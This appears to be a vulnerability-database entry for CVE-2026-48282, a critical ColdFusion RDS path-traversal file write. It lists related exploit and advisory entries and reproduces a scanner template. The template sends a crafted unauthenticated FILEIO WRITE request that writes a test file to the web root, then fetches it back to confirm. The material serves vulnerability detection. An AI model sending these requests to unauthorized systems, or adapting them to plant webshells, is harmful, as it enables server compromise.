| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Exploit for Path Traversal in Adobe Coldfusion | 7 Jul 202622:23 | – | githubexploit | |
| Exploit for Path Traversal in Adobe Coldfusion | 6 Jul 202612:57 | – | githubexploit | |
| Exploit for Path Traversal in Adobe Coldfusion | 6 Jul 202612:57 | – | githubexploit | |
| CVE-2026-48282: Mitigating a Critical Vulnerability in Adobe ColdFusion | 8 Jul 202608:00 | – | akamaiblog | |
| CVE-2026-48282 | 30 Jun 202615:11 | – | attackerkb | |
| The vulnerability of the ColdFusion software platform arises from an incorrect restriction on the path to the restricted directory. This allows attackers to execute arbitrary code. | 6 Jul 202600:00 | – | bdu_fstec | |
| CVE-2026-48282 | 1 Jul 202603:37 | – | circl | |
| Adobe ColdFusion Path Traversal Vulnerability | 7 Jul 202600:00 | – | cisa_kev | |
| Adobe ColdFusion 2023.x < 2023u21 / 2025.x < 2025u10 Multiple Vulnerabilities (APSB26-68) | 3 Jul 202600:00 | – | nessus | |
| CVE-2026-48282 | 30 Jun 202615:11 | – | cve |
id: CVE-2026-48282
info:
name: Adobe ColdFusion - RDS Arbitrary File Write
author: watchtowr,DhiyaneshDk
severity: critical
description: |
ColdFusion versions 2025.9, 2023.20 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary code execution in the context of the current user. The RDS FILEIO WRITE operation allows unauthenticated attackers to write arbitrary files when RDS is enabled with authentication disabled. Exploitation of this issue does not require user interaction. Scope is changed.
impact: |
An attacker can write arbitrary files to the server filesystem, leading to remote code execution by writing CFML webshells to the web root.
remediation: |
Update to ColdFusion 2025 Update 10 or ColdFusion 2023 Update 21 or later.
reference:
- https://helpx.adobe.com/security/products/coldfusion/apsb26-68.html
- https://labs.watchtowr.com/its-37oc-and-all-we-can-think-about-is-coldfusion-adobe-coldfusion-security-bulletin-apsb26-68-cve-bonanza/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2026-48282
epss-score: 0.03199
epss-percentile: 0.86593
cwe-id: CWE-22
metadata:
verified: true
tags: cve,cve2026,rce,file-upload,adobe,coldfusion,rds,intrusive,kev,vkev
variables:
randfile: "{{to_lower(rand_text_alpha(8))}}"
flow: |
http("write") && http("verify")
http:
- id: write
raw:
- |
POST /CFIDE/main/ide.cfm?ACTION=FILEIO HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
4:{{pathlen}}:{{dirpath}}{{randfile}}.txt000005:WRITE000001:0000008:{{randfile}}
payloads:
dirpath:
- '/opt/coldfusion/cfusion/wwwroot/CFIDE/'
- 'C:\ColdFusion2025\cfusion\wwwroot\CFIDE\'
- 'C:\ColdFusion2023\cfusion\wwwroot\CFIDE\'
pathlen:
- '000050'
- '000052'
- '000052'
attack: pitchfork
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "1:2:")'
condition: and
internal: true
- id: verify
raw:
- |
GET /CFIDE/{{randfile}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{randfile}}'
- type: status
status:
- 200
# digest: 4b0a00483046022100b89cbf4d1b89cbeae7316cf100cb89178af14e12dcd39977c8ff2bcb43b8ff19022100b336be902dbea72088c80956852c7340c5e086c00fcfaa28d5c0e6d4da850bc2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation